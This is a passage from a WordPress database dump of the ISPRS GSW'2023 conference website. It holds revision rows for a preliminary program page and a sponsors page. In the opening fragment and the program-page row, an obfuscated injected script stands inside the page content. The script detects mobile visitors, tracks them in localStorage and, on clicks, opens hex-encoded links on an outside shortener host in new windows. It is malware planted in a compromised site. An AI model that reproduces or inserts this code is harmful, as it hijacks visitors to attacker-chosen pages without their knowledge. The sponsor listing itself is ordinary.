|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','','','inherit','closed','closed','','2669-revision-v1','','','2023-06-23 21:10:39','2023-06-23 21:10:39','',2669,'https://gsw2023.com/?p=4764',0,'revision','',0),
(4765,4,'2023-06-23 21:12:34','2023-06-23 21:12:34','[vc_row][vc_column][vc_column_text]\r\n<h3><strong>ISPRS GSW’2023 - Preliminary Program</strong></h3>\r\n[/vc_column_text][vc_single_image image=\"4745\" img_size=\"1900x800\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','inherit','closed','closed','','2669-revision-v1','','','2023-06-23 21:12:34','2023-06-23 21:12:34','',2669,'https://gsw2023.com/?p=4765',0,'revision','',0),
(4766,1,'2023-06-23 23:59:46','2023-06-23 23:59:46','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the 